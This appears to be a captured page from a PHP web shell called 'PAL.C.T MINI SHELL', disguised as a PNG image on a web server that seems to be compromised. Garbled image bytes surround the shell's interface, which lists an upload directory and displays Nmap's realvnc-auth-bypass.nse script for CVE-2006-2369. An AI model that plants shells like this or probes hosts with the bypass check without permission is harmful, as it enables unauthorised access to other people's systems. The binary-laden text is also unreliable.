php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/Rm19_symconf/root/usr/share/nmap/scripts/
upload
files >> /var/www/html/sub/images/Rm19_symconf/root/usr/share/nmap/scripts/realvnc-auth-bypass.nse

description = [[
Checks if a VNC server is vulnerable to the RealVNC authentication bypass
(CVE-2006-2369).
]]
author = "Brandon Enright"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

---
-- @output
-- PORT     STATE SERVICE VERSION
-- 5900/tcp open  vnc     VNC (protocol 3.8)
-- |_realvnc-auth-bypass: Vulnerable

categories = {"auth", "default", "vuln", "safe"}

require "shortport"

portrule = shortport.port_or_service(5900, "vnc")

action = function(host, port)
	local socket = nmap.new_socket()
	local result
	local status = true

	socket:connect(host, port)
	
	status, result = socket:receive_lines(1)

	if (not status) then
		socket:close()
		return
	end

	socket:send("RFB 003.008\n")
	status, result = socket:receive_bytes(2)

	if (not status or result ~= "\001\002") then
		socket:close()
		return
	end

	socket:send("\001")
	status, result = socket:receive_bytes(4)

	if (not status or result ~= "\000\000\000\000") then
		socket:close()
		return
	end

	socket:close()

	return "Vulnerable"
end
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`